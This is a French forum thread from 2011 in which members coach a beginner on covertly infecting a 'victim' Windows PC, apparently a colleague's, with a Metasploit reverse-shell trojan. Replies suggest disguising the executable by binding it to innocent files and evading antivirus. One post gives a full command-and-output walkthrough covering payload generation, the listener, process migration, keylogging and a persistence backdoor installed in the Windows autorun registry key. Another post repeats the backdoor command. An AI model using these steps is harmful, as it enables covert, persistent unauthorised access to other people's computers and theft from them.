Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 13-07-2011 14:46:24

Hadley's_Hope
Membre
Inscription : 13-07-2011
Messages : 23

Metasploit (exploit.exe TO PC_victime)

Lu tout le monde,

Je suis débutant avec metasploit mais j'me débrouille.
Je suis en réseau local:       PC_attaquant(BT5_livecd)<-----RJ45----->PC_victime(win..7)
                                             192.168.1.10                                           192.168.1.20

J'utilise reverse_tcp pour le trojan "exploit.exe"
Je suis arrivé grace à une clé usb à transmettre le trojan et a terminer un tuto.
EDIT: tuto_video > migrate PID "explorer.exe; start notepad.exe; keyscan_start; keyscan_dump; puis pareille avec firefox.exe

Question 1> Dans les vidéo de BT4 il utilise la commande "use priv" sans problème or sous BT5 lorsque j'utilise la commande "use priv" BT5 me dit en gros que 'priv' a déjà été chargé (même apres avoir  fais msfupdate).
""use priv"" se charge t-il automatiquement sous BT5 lorsque la victime execute "exploit.exe"??

Question 2> comment transmettre le trojan "exploit.exe" à la machine distante sans se déplacer avec la clé usb et surtout sans que la victime (pc et utilisateurs) s'en rendent compte????

EDIT : si sa peut vous aider:

[email protected]:/pentest/exploits/framework3# ./msfconsole 

#    # ###### #####   ##    ####  #####  #       ####  # #####
##  ## #        #    #  #  #      #    # #      #    # #   #
# ## # #####    #   #    #  ####  #    # #      #    # #   #
#    # #        #   ######      # #####  #      #    # #   #
#    # #        #   #    # #    # #      #      #    # #   #
#    # ######   #   #    #  ####  #      ######  ####  #   #


       =[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 713 exploits - 362 auxiliary - 58 post
+ -- --=[ 225 payloads - 27 encoders - 8 nops
       =[ svn r13161 updated today (2011.07.13)

PS: désolé si vous avez  du mal a comprendre mais j'ai passé une nuit blanche à me battre avec metasploit!!!!

Dernière modification par Hadley's_Hope (13-07-2011 15:22:53)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 13-07-2011 17:36:30

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Metasploit (exploit.exe TO PC_victime)

Salut Hadley's_Hope, bienvenue sur le forum smile

sous BT5 lorsque j'utilise la commande "use priv" BT5 me dit en gros que 'priv' a déjà été chargé (même apres avoir  fais msfupdate).
""use priv"" se charge t-il automatiquement sous BT5 lorsque la victime execute "exploit.exe"??

Possible, je n'ai pas suivi les derniers développements de meterpreter. Si ça se trouve, il y a eu une refonte de code qui fait que le module "priv" est intégré à autre chose et chargé d'office. Mais en fin de compte, c'est pas un souçis majeur : si le système te dit que le module est chargé, ben tant mieux smile

Question 2> comment transmettre le trojan "exploit.exe" à la machine distante sans se déplacer avec la clé usb et surtout sans que la victime (pc et utilisateurs) s'en rendent compte????

Tu peux lui envoyer la clé USB par la poste, ça marchera aussi big_smile Plus sérieusement, il y a de nombreux vecteurs d'attaque possibles :
- l'envoyer en pièce jointe à un mail (mais les .EXE sont de + en + souvent bloqués par les mails)
- l'envoyer par MSN/... en disant que c'est un patch important pour avoir un Nyan Cat qui danse en fond d'écran
- le binder (lier) à un fichier d'apparence innocent (lady_gaga.mp3, nude_busty_teen.jpg,...) mais c'est un peu plus technique

Après, il y a toutes les techniques où le code n'est pas compilé sous forme d'un exécutable :
- intégré à un PDF piégé (très à la mode !)
- intégré comme macro à un document MS Office (moins efficace depuis que les gens se méfient des macros)
- intégré à une page Web sur laquelle on envoie l'utilisateur
- injecté dans une DLL (que tu dois quand même copier "à la main" sur l'ordi-cible, sauf si tu es très convaincant et que la victime la copie ell-même)

Bref, tout ça dépend de ce qu'on appelle "l'ingénierie sociale : forcer la victime à coopérer sans quelle s'en rende compte. Amusant sur le plan psychologique, mais moins gratifiant sur le plan technique tongue
Tu peux regarder le programme "Social Engineering Toolkit" (SET, de son petit nom), il propose la création de toute une série d'attaques dont celles que j'ai citées ici wink

Hors Ligne

#3 13-07-2011 18:18:21

Reyals
Membre Radioactif
Inscription : 08-01-2011
Messages : 74

Re : Metasploit (exploit.exe TO PC_victime)

nude_busty_teen.jpg

Je suis certain à 99.99% qu'il va l'ouvrir! lol

Sinon, voici une petite idée. Fais un .exe qui ouvre un logiciel annondin, patch pour un jeu ou n'importe quoi qu'il va vouloir utiliser. Change l'icon de ton programme pour quelque chose de crédible. Mais fais en sorte que lorsque que la patch se lance, ton .exe lance en parallèle ton trojan wink C'est pour ça que télécharger des jeux sur les torrents c'est le démon.


Soyons réaliste, exigeons l'impossible ! [Ché Guevara]

Hors Ligne

#4 13-07-2011 18:25:23

Hadley's_Hope
Membre
Inscription : 13-07-2011
Messages : 23

Re : Metasploit (exploit.exe TO PC_victime)

Ok merci des infos je vais méditer se soir devant une table de poker ^^

""- le binder (lier) et le programme SET"" ont l'air vraiment intéressant ( vu que tout le monde DL tout et nimporte quoi du moment qu'il arrive à leur but).
Si ta un lien pour "binder (lier)" et "SET" tu pourrais l'ajouter (de toute façon j'irais faire un saut dans la fonction recherche que je love, et j'éditerais au passage).


Question 3) Nous changeons tous d'adresse IP mais grâce à dyndns le problème est ""résolue"". Je voudrais savoir si je suis obligé de redonner un nouveau "exploit.exe" avec ma nouvelle adresse IP dans LHOST, ou si je peux par je sais quel moyen, mettre le nom de domaine fournie par dyndns et comme sa plus de soucis???

Hors Ligne

#5 13-07-2011 19:11:38

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Metasploit (exploit.exe TO PC_victime)

Pour les binder, il existe des programmes sur le net où tu lui donnes 2 fichiers et il t'en sort un qui est la combinaison des 2 : en ouvrant une image, l'exécutable est lancé ("et là, c'est le drame..."). J'en ai pas comme ça en tête, mais tu peux jeter un oeil ici pour avoir une base --> BINDER : HACKING SOFTWARE TO HIDE TROJANS AND VIRUSES
Si tu vas sur certains forums + orientés trojan, tu en auras à la pelle des binders (prononcer baïndeurz). Attention, les binders les + courants laissent une "signature" qui est repérée par les antivirus, donc essaie d'utiliser un truc un peu exotique si tu veux rester discret wink

Pour le SET, je n'ai pas de lien comme ça en tête, mais c'est assez explicite une fois que tu as lancé le programme. Voilà comment le lancer dans BackTrack 5 :

cd /pentest/exploits/set/
./set
# l'anglais est quand même fortement conseillé pour l'utiliser...

Tu as aussi l'interface web que tu peux lancer depuis le menu :

BackTrack > Exploitation Tools > Social Engineering Tools > Social Engineering Toolkit > set-web

Sinon, sur Google tu devrais trouver de quoi te montrer comment ça marche wink

Pour le (3), tu peux utiliser un payload qui permet d'utiliser un nom de domaine plutôt qu'une adresse IP. Ca se fait en 2 étapes :
- te créer un compte dyndns (il y en a d'autres : no-ip, etc...) pour avoir un nom de domaine qui sera toujours redirigé vers ta machine même si ton IP change
- utiliser le payload [c]meterpreter/reverse_tcp_dns[/c] ou [c]meterpreter/reverse_https[/c] qui permettent d'utiliser ton nom de domaine dyndns comme "serveur de retour"
Plus de détails --> Persistent Meterpreter over Reverse HTTPS

Hors Ligne

#6 14-07-2011 03:20:27

Hadley's_Hope
Membre
Inscription : 13-07-2011
Messages : 23

Re : Metasploit (exploit.exe TO PC_victime)

Merci je vais essayer de voir sa maintenant...
pour le SET > SET_tuto_Crack-wifi.com

Aller on allume sa vm pam

Hors Ligne

#7 14-07-2011 04:12:36

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Metasploit (exploit.exe TO PC_victime)

Pour le binder, tu peux aussi utiliser un qui est très simple livré avec Windows: "IExpress"

Tu tapes ( Démarrer > Exécuter --> iexpress.exe )

En revanche, celui-ci permet de binder uniquement deux fichiers Exe. Tu peux configurer lequel des deux s'exécutera en premier, et lorsque la victime ferme celui-ci, l'autre démarre à son tour en tâche de fond.

Tu peux aussi voir ce topic très intéressant wink

Hors Ligne

#8 15-07-2011 01:17:23

Hadley's_Hope
Membre
Inscription : 13-07-2011
Messages : 23

Re : Metasploit (exploit.exe TO PC_victime)

J'en prend note ^^.

Bon je ne vais pas faire un autre topic, mais j'ai un léger gros problème d’ailleurs je ne sais même pas si cela fonctionne, mais je me suis pris la tête TOUTE LA JOURNEE avec sa.

Question 4) metasploit fonctionne t-il lorsque backtrack 5 fonctionne sous VMware???? Je pense que je me fais des illusions mais bon.
Et si cela fonctionne je voudrais bien savoir (au niveau réseau local) qu'elle adresse ip je doit mettre dans la commande "./msfpayload windows/meterpreter/reverse_tcp LHOST=????? LPORT=4444 x > /root/Desktop/exploit.exe":
   - l'adresse ip de la machine hôte : 192.168.1.X (reseau livebox avec dhcp 192.168.1.10- 192.168.1.30)
   - l'adresse ip de la machine vmware : 192.168.43.129

ps0: j'ai essayé les deux IP (hôte et vmware) mais je voudrai quand même un avis.
ps1: vmware(192.128.43.129) ping victime (192.168.100.100) et hôte(192.168.100.200)
ps2: victime (192.168.100.100) ne ping pas vmware (192.168.43.129)
ps3: victime (192.168.100.100) ping hôte (192.168.100.200)
PS4: je suis en NAT et pas en BRIDGE pour la carte réseau de la VMware backtrack!!!!

Sinon en bootant sur le live cd backtrack 5 aucun probléme!

Merci pour vos conseilles.

Hors Ligne

#9 15-07-2011 02:48:41

toto
Membre V.I.P.
Lieu : chez le docteur aussi
Inscription : 15-01-2011
Messages : 221

Re : Metasploit (exploit.exe TO PC_victime)

metasploitable

Lisez misc :-) camarades

Hors Ligne

#10 15-07-2011 04:09:05

Hadley's_Hope
Membre
Inscription : 13-07-2011
Messages : 23

Re : Metasploit (exploit.exe TO PC_victime)

error:(:pam::recherche::P:pam::pam::yeahanim:

Probléme résolue

En faite j'avais modifié les paramétres ip des cartes réseaux VMW01 et VMW08 et sa a foutu la merde.
J'ai désinstallé et reinstallé VMware, reinstaller mon .iso j'ai mis le mod BRIDGE et ops magie la carte réseau a pris une adresse ip grâce au dhcp et j'ai pu faire tout sque je voulais. OUF.


Voila ce que j'ai pu faire :

Aller dans > /opt/framework3/msf3


Creation du payload:
./msfpayload windows/meterpreter/reverse_tcp [email protected] LPORT=4444 x > /root/Desktop/exploit.exe
...
...\\exploit.exe créé sur bureau


Configuration du serveur sur la machine attaquante:
./msfconsole
...
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST [email protected]
LHOST => [email protected]
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > show option
....
msf exploit(handler) > exploit \\active le serveur (l'exploit dois etre executer sur le pc victime avec les droit admin)

msf exploit(handler) > [*] Meterpreter session 1 opened     (192.168.1.16:4444 -> 192.168.1.200:49174) at 2011-07-15 04:16:56 +0200  \\connection etablie
   

TOUT CELA SE FAIS AUTOMATIQUEMENT SUR BT5
|    meterpreter > use priv
|    Loading extention priv .. success.
|    meterpreter > run scheduleme -h
|    meterpreter > run scheduleme -m 1 -u -e /root/Desktop/exploit.exe
|__________


Lorsque connection établie (victime a exécuté le "exploit.exe" que vous lui avez envoyé) faire:
meterpreter > ps (affiche les processus lancé de la victime)
meterpreter >migrate 1820 [migrate PID, moi pour migrer mon serveur je fais "migrate 1820" (1820=PID de son explorer.exe) comme sa si il veut eteindre mon server il devra eteindre le processus "explorer.exe" (mais sa faut le savoir hein)]

migrate success
meterpreter >


Utilisation du script persistence.rb pour maintenir l'accés:
meterpreter > run persistence -h
OPTIONS:

    -A Automatically start a matching multi/handler to connect to the agent
    -X Automatically start the agent when the system boots
    -h This help menu
    -i The interval in seconds between each connection attempt
    -p The port on the remote host where Metasploit is listening
    -r The IP of the system running Metasploit listening for the connect back

meterpreter > run persistence -A -X -i 60 -p 4444 -r 192.168.0.69

[*] Creating a persistent agent: [email protected] LPORT=4444 (interval=60 onboot=true)[*] Persistent             agent script is 731282 bytes long[*] Uploaded the persistent agent to   C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\fjBnpFnjnN.vbs[*] Agent executed with PID 1948[*] Installing into a   utorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run \IeDEEiTohfs[*] Installed into autorun as  HKLM\Software\Microsoft\Windows\CurrentVersion\Run \IeDEEiTohfs
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf3/logs/persistence/FIORINA161-PC_20110715.0629/FIORINA161-PC_20110715.0629.rc   
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444   
[*] Persistent agent script is 613949 bytes long
[+] Persistent Script written to C:\Users\FIORIN~1\AppData\Local\Temp\CPSaWSXKSbnlz.vbs
[*] Starting connection handler at port 4444 for windows/meterpreter/reverse_tcp   
[+] Multi/Handler starterd!
[*] Executing script C:\Users\FIORIN~1\AppData\Local\Temp\CPSaWSXKSbnlz.vbs
[+] Agent executed with PID 3396   
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\bdhrsBWkT
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\bdhrsBWkT

meterpreter > [*] Meterpreter session 2 opened (192.168.1.16:4444 -> 192.168.1.200:49166) at 2011-07-15 04:06:40 +0200

ps
Process list
============

PID   Name                      Arch  Session  User                        Path
---   ----                      ----  -------  ----                       


Lorsque la victime rééxucutera votre "exploit.exe" et que vous serai prêt  c'est-à-dire dans "msf exploit(handler)" avec la même adresse IP (sinon sa fonctionne plus) vous aurez cela :

msf exploit(handler) > [*] Meterpreter session 4 opened     (192.168.1.16:4444 -> 192.168.1.200:49174) at 2011-07-15 04:16:56 +0200
   
sessions -i 4 \\ se connecte sur la session 4 qui viens de se créer grace au script persistence précédent
   
[*] Starting interaction with 4...
...

meterpreter > ps
Process list
============

PID   Name                      Arch  Session  User                        Path
---   ----     


Apres avoir lancé le shell, on peut s'amusé a lancer des pages internet, et plein d'autre chose:
meterpreter > shell
Process 1412 created.
Channel 1 created.
Microsoft Windows [version 6.1.7600]
Tous droits r?serv?s.

C:\Users\Fiorina161\Desktop>start www.google.fr
start www.google.fr \\ la victime voix une page internet apparaitre qui va sur google.fr ^^




Bon il est 5h23 il est temps que j'aille dormir un peu quand même....

Dernière modification par Hadley's_Hope (15-07-2011 04:24:31)

Hors Ligne

#11 20-11-2011 23:20:36

h9k
Membre Radioactif
Inscription : 09-08-2011
Messages : 74

Re : Metasploit (exploit.exe TO PC_victime)

est ce qu'il y a moyen d'envoyer un fichier sur un ordinateur distant, juste avec un port ouvert sur le pc en question ? si non, est ce possible ? et comment ?

Hors Ligne

#12 20-11-2011 23:37:20

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Metasploit (exploit.exe TO PC_victime)

"Juste un port ouvert" ça ne veut rien dire, ça dépend du programme qui tourne derrière et surtout de sa version.

Si le programme en question a une faille, tu peux probablement l'exploiter avec Metasploit. Une fois que la faille est exploitée, tu peux injecter du code dans la mémoire de l'ordi-victime et tu fais un peu ce que tu veux. Avec un Meterpreter (sorte de console améliorée pour l'attaquant) tu peux effectivement envoyer un fichier sur la machine ou en télécharger un depuis le système distant.

Note que c'est assez difficile de faire ça sur un ordi "domestique", il n'y a pas assez de services et ceux-ci sont rarement faillibles très longtemps...

Hors Ligne

#13 21-11-2011 00:44:06

h9k
Membre Radioactif
Inscription : 09-08-2011
Messages : 74

Re : Metasploit (exploit.exe TO PC_victime)

je voulais dire envoyer un payload sous forme de fichier .exe ou.pdf ou autre..

Hors Ligne

#14 21-11-2011 11:02:30

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Metasploit (exploit.exe TO PC_victime)

h9k a écrit :

je voulais dire envoyer un payload sous forme de fichier .exe ou.pdf ou autre..

Pour ça, ne t'emm* pas à intégrer ton payload dans un conteneur genre PDF : il faudrait encore que l'utilisateur le lance lui-même... Si tu arrives à exploiter une faille sur la machine distante, tu peux directement injecter du code dans la mémoire de la machine et tu auras le même résultat sans aucune intervention de l'utilisateur.

Par contre je le répète, c'est quasi impossible à réaliser sur une machine de particulier, à moins d'avoir énormément de chance... wink

Hors Ligne

#15 23-11-2011 03:50:45

h9k
Membre Radioactif
Inscription : 09-08-2011
Messages : 74

Re : Metasploit (exploit.exe TO PC_victime)

je teste windows 7 ultimate sp1 mis a jour et je ne trouve pas de failles, j'ai testé ce système 5.2 et 5.4, ya il d'autres moyens ?

est ce possible qu'un payload soit executé une fois puis enregistré dans le système victime, et ce même si le fichier initial est supprimé, et qu'ensuite le payload enregistré en dur s'execute des que le pc est allumé, est ce que metasploit gère ce type de virus ?

j'ai entendu qu'il y a une différence entre les vers et les trojans, j'ai entendu aussi qu'un vers peut s'introduire dans un pc, et ce sans ouvrir son navigateur ou de logiciels connectés au net, juste en allumant un ordi connecté au net, est ce que metasploit gère des vers ?

Dernière modification par h9k (23-11-2011 03:54:32)

Hors Ligne

#16 23-11-2011 12:14:59

Hadley's_Hope
Membre
Inscription : 13-07-2011
Messages : 23

Re : Metasploit (exploit.exe TO PC_victime)

Salut h9k,

Je t'avourai que sa fait 4 mois que je n'y est plus touché, mais d'aprés mes souvenir (et aprés relecture du topic), je te dirait que """mon""" payload.exe est actif uniquement lorsque la victime (collégue) execute "payload.exe".

Peut être qu'aprés tu peux migrer ton payload.exe dans un processus beaucoup utilisé:
   -firefox, iexplorer,...
   -svchost.exe
ensuite il suffit qu'il lance l'une des appli et le lien entre sa machine et la tienne est créé.

Le plus dur est d'y accéder la premiére fois.

antares145 21-11-2011 05:02:30
"Par contre je le répète, c'est quasi impossible à réaliser sur une machine de particulier, à moins d'avoir énormément de chance... "
>>> La faute est toujours humaine, suffit que le particulier ne fais pas de mise à jour des failles ^^

D'ailleurs ça me fais penser à un poste/article:  Une entreprise super sécurisé a mit au défie certaines personne pour tester la fiabilité de leur sécurité. Au final ils se sont fait pirater.
Solution= souris usb (contenant le logiciel vérolé) envoyé en cadeau à un utilisateur qui c'est empressé de la brancher et boom GAME OVER: piratage réussi.

Hors Ligne

#17 23-11-2011 15:10:54

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Metasploit (exploit.exe TO PC_victime)

D'ailleurs ça me fais penser à un poste/article:  Une entreprise super sécurisé a mit au défie certaines personne pour tester la fiabilité de leur sécurité. Au final ils se sont fait pirater.
Solution= souris usb (contenant le logiciel vérolé) envoyé en cadeau à un utilisateur qui c'est empressé de la brancher et boom GAME OVER: piratage réussi.

>>> Un hack tout en finesse !

h9k a écrit :

est ce possible qu'un payload soit executé une fois puis enregistré dans le système victime, et ce même si le fichier initial est supprimé, et qu'ensuite le payload enregistré en dur s'execute des que le pc est allumé, est ce que metasploit gère ce type de virus ?

Tu veux dire s'il existe un moyen pour que le payload reste toujours sur la machine compromise, autrement dit, maintenir un accès sur la machine cible. Meterpreter permet de le faire, il faudrait voir dans ses options:

run persistence -X -i 30 -p 4444 -r 192.168.x.x

Cela permet de créer une backdoor qui démarre à chaque fois que l'ordi cible s'allume:

-X  pour qu'elle se lance qu démarrage de l'ordi.
-i   l'intervale de temps qu'elle doit joindre le gestionnaire (handler) si elle n'a pas de reponse se celui ci, ici 30 secondes
-p  le port d’écoute
-r  ton adresse IP sur laquelle le (handler) écoute.

Tu tapes la commande suivante dans l'invite meterpreter pour plus de details:

run persistence -h

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.046 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]